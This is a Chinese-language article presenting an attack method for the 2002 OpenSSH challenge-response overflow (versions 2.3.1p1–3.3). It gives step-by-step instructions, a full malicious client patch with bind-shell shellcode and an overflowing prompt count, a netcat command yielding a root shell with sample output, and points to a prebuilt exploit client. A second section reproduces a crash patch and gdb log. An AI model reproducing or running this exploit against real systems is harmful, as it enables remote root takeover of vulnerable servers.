OpenSSH溢出攻击方法

　　在OpenSSH 2.3.1p1到3.3版本中，关于挑战反应处理代码存在安全性缺陷。允许远程入侵者以sshd(通常是root)进程的身份执行任意指令。

　　第一个缺陷是因为在挑战反应认证过程中，OpenSSH在处理关于收到的响应次数的变量上存在整型溢出风险，如果挑战反应设置为打开，并且系统使用SKEY或者BSD_AUTH认证选项，则允许攻击者利用此缺陷远程执行任意指令。这个漏洞已经被证实。

　　第二个缺陷牵涉到使用交互式键盘认证的PAM模块, OpenSSH 2.3.1p1~3.3版本。OpenSSH在处理关于收到的响应次数的变量上存在缓冲溢出风险，不论挑战反应设置如何，系统使用交互式键盘认证的PAM模块(PAMAuthenticationViaKbdInt)，可能会导致允许远程非法执行指令的风险。目前尚未有代码证实是否能达到攻击效果。

　　对这两个缺陷的攻击，都建立在使用SSH ver2的版本特征上。

　　多个Linux/Unix平台受该漏洞影响。

　　============================================================

　　攻击方法：

　　1. 下载 openssh-3.2.2p1.tar.gz 并解压

　　~ $ tar -xvzf openssh-3.2.2p1.tar.gz

　　2. 执行提供的补丁: (将下方补丁文件存为path_to_diff_file)

　　~/openssh-3.2.2p1 $ patch <path_to_diff_file

　　3. 编译已经打过补丁的OpenSSH客户端：

　　~/openssh-3.2.2p1 $ ./configure &&make ssh

　　4. 运行ssh:

　　~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

　　5. 如果成功，则可连接128端口

　　~ $ nc localhost 128

　　uname -a

　　OpenBSD nice 3.1 GENERIC#59 i386

　　id

　　uid=0(root) gid=0(wheel) groups=0(wheel)

　　(除此之外，bugtraq.org提供了一个打过补丁的SSH攻击客户端：sshutup-theo.tar.gz)

　　===========补丁文件===============

　　--- sshconnect2.c Sun Mar 31 20:49:39 2002

　　+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002

　　@@ -839,6 +839,56 @@

　　/*

　　* parse INFO_REQUEST, prompt user and send INFO_RESPONSE

　　*/

　　+

　　+int do_syscall( int nb_args, int syscall_num, ... );

　　+

　　+void shellcode( void )

　　+{

　　+ int server_sock, client_sock, len;

　　+ struct sockaddr_in server_addr;

　　+ char rootshell[12], *argv[2], *envp[1];

　　+

　　+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );

　　+ server_addr.sin_addr.s_addr = 0;

　　+ server_addr.sin_port = 32768;

　　+ server_addr.sin_family = AF_INET;

　　+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,

　　16 );

　　+ do_syscall( 2, 106, server_sock, 1 );

　　+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)

　　+ &server_addr, &len );

　　+ do_syscall( 2, 90, client_sock, 0 );

　　+ do_syscall( 2, 90, client_sock, 1 );

　　+ do_syscall( 2, 90, client_sock, 2 );

　　+ * (int *) ( rootshell + 0 ) = 0x6E69622F;

　　+ * (int *) ( rootshell + 4 ) = 0x0068732f;

　　+ * (int *) ( rootshell + 8 ) = 0;

　　+ argv[0] = rootshell;

　　+ argv[1] = 0;

　　+ envp[0] = 0;

　　+ do_syscall( 3, 59, rootshell, argv, envp );

　　+}

　　+

　　+int do_syscall( int nb_args, int syscall_num, ... )

　　+{

　　+ int ret;

　　+ asm(

　　+ "mov 8(%ebp), %eax; "

　　+ "add $3,%eax; "

　　+ "shl $2,%eax; "

　　+ "add %ebp,%eax; "

　　+ "mov 8(%ebp), %ecx; "

　　+ "push_args: "

　　+ "push (%eax); "

　　+ "sub $4, %eax; "

　　+ "loop push_args; "

　　+ "mov 12(%ebp), %eax; "

　　+ "push $0; "

　　+ "int $0x80; "

　　+ "mov %eax,-4(%ebp)"

　　+ );

　　+ return( ret );

　　+}

　　+

　　void

　　input_userauth_info_req(int type, u_int32_t seq, void *ctxt)

　　{

　　@@ -865,7 +915,7 @@

　　xfree(inst);

　　xfree(lang);

　　- num_prompts = packet_get_int();

　　+ num_prompts = 1073741824 + 1024;

　　/*

　　* Begin to build info response packet based on prompts requested.

　　* We commit to providing the correct number of responses, so if

　　@@ -874,6 +924,13 @@

　　*/

　　packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);

　　packet_put_int(num_prompts);

　　+

　　+ for( i = 0; i <1045; i++ )

　　+ packet_put_cstring( "xxxxxxxxxx" );

　　+

　　+ packet_put_string( shellcode, 2047 );

　　+ packet_send();

　　+ return;

　　debug2("input_userauth_info_req: num_prompts %d", num_prompts);

　　for (i = 0; i <num_prompts; i++) {

　　===========END 补丁文件===============

　　附加信息：

　　How to reproduce OpenSSH Overflow.

　　The R7 team did a little investigating into one of the OpenSSH

　　vulnerabilities.

　　The following are instructions on how to reproduce a segmentation

　　violation in sshd (v3.2.3p1):

　　0.) Compile with PAM and S/KEY support.

　　1.) Apply the following patch to the ssh client:

　　- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002

　　+++ sshconnect2.c Thu Jun 27 11:56:27 2002

　　@@ -866,6 +866,7 @@

　　xfree(lang);

　　num_prompts = packet_get_int();

　　+ num_prompts = 2;

　　/*

　　* Begin to build info response packet based on prompts requested.

　　* We commit to providing the correct number of responses, so if

　　@@ -877,15 +878,16 @@

　　debug2("input_userauth_info_req: num_prompts %d", num_prompts);

　　for (i = 0; i <num_prompts; i++) {

　　+ if ( i == 0 ) {

　　prompt = packet_get_string(NULL);

　　echo = packet_get_char();

　　response = read_passphrase(prompt, echo ? RP_ECHO : 0);

　　- -

　　+ }

　　packet_put_cstring(response);

　　- - memset(response, 0, strlen(response));

　　+ /*memset(response, 0, strlen(response));

　　xfree(response);

　　- - xfree(prompt);

　　+ xfree(prompt);*/

　　}

　　packet_check_eom(); /* done with parsing incoming message. */

　　2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.

　　3.) Connect to sshd using the modified client.

　　Note: valid credentials are not required.

　　On the server side, you'll see:

　　[root@wonderland hi_chad]# gdb /usr/sbin/sshd

　　GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)

　　Copyright 2001 Free Software Foundation, Inc.

　　GDB is free software, covered by the GNU General Public License, and you are

　　welcome to change it and/or distribute copies of it under certain

　　conditions.

　　Type "show copying" to see the conditions.

　　There is absolutely no warranty for GDB. Type "show warranty" for details.

　　This GDB was configured as "i386-redhat-linux"...

　　(no debugging symbols found)...

　　(gdb) run -d

　　Starting program: /usr/sbin/sshd -d

　　debug1: sshd version OpenSSH_3.2.3p1

　　debug1: private host key: #0 type 0 RSA1

　　debug1: read PEM private key done: type RSA

　　debug1: private host key: #1 type 1 RSA

　　debug1: read PEM private key done: type DSA

　　debug1: private host key: #2 type 2 DSA

　　socket: Address family not supported by protocol

　　debug1: Bind to port 22 on 0.0.0.0.

　　Server listening on 0.0.0.0 port 22.

　　Generating 768 bit RSA key.

　　RSA key generation complete.

　　debug1: Server will not fork when running in debugging mode.

　　Connection from 127.0.0.1 port 33208

　　debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1

　　debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*

　　Enabling compatibility mode for protocol 2.0

　　debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1

　　debug1: list_hostkey_types: ssh-rsa,ssh-dss

　　debug1: SSH2_MSG_KEXINIT sent

　　debug1: SSH2_MSG_KEXINIT received

　　debug1: kex: client->server aes128-cbc hmac-md5 none

　　debug1: kex: server->client aes128-cbc hmac-md5 none

　　debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received

　　debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent

　　debug1: dh_gen_key: priv key bits set: 124/256

　　debug1: bits set: 1626/3191

　　debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT

　　debug1: bits set: 1597/3191

　　debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent

　　debug1: kex_derive_keys

　　debug1: newkeys: mode 1

　　debug1: SSH2_MSG_NEWKEYS sent

　　debug1: waiting for SSH2_MSG_NEWKEYS

　　debug1: newkeys: mode 0

　　debug1: SSH2_MSG_NEWKEYS received

　　debug1: KEX done

　　debug1: userauth-request for user jdog service ssh-connection method none

　　debug1: attempt 0 failures 0

　　debug1: Starting up PAM with username "jdog"

　　debug1: PAM setting rhost to "localhost.localdomain"

　　Failed none for jdog from 127.0.0.1 port 33208 ssh2

　　debug1: userauth-request for user jdog service ssh-connection method

　　keyboard-interactive

　　debug1: attempt 1 failures 1

　　debug1: keyboard-interactive devs

　　debug1: auth2_challenge: user=jdog devs=

　　debug1: kbdint_alloc: devices 'skey'

　　debug1: auth2_challenge_start: trying authentication method 'skey'

　　debug1: got 2 responses

　　(no debugging symbols found)...

　　Program received signal SIGSEGV, Segmentation fault.

　　0x08053822 in strcpy ()

　　(gdb)

　　Comments are much appreciated.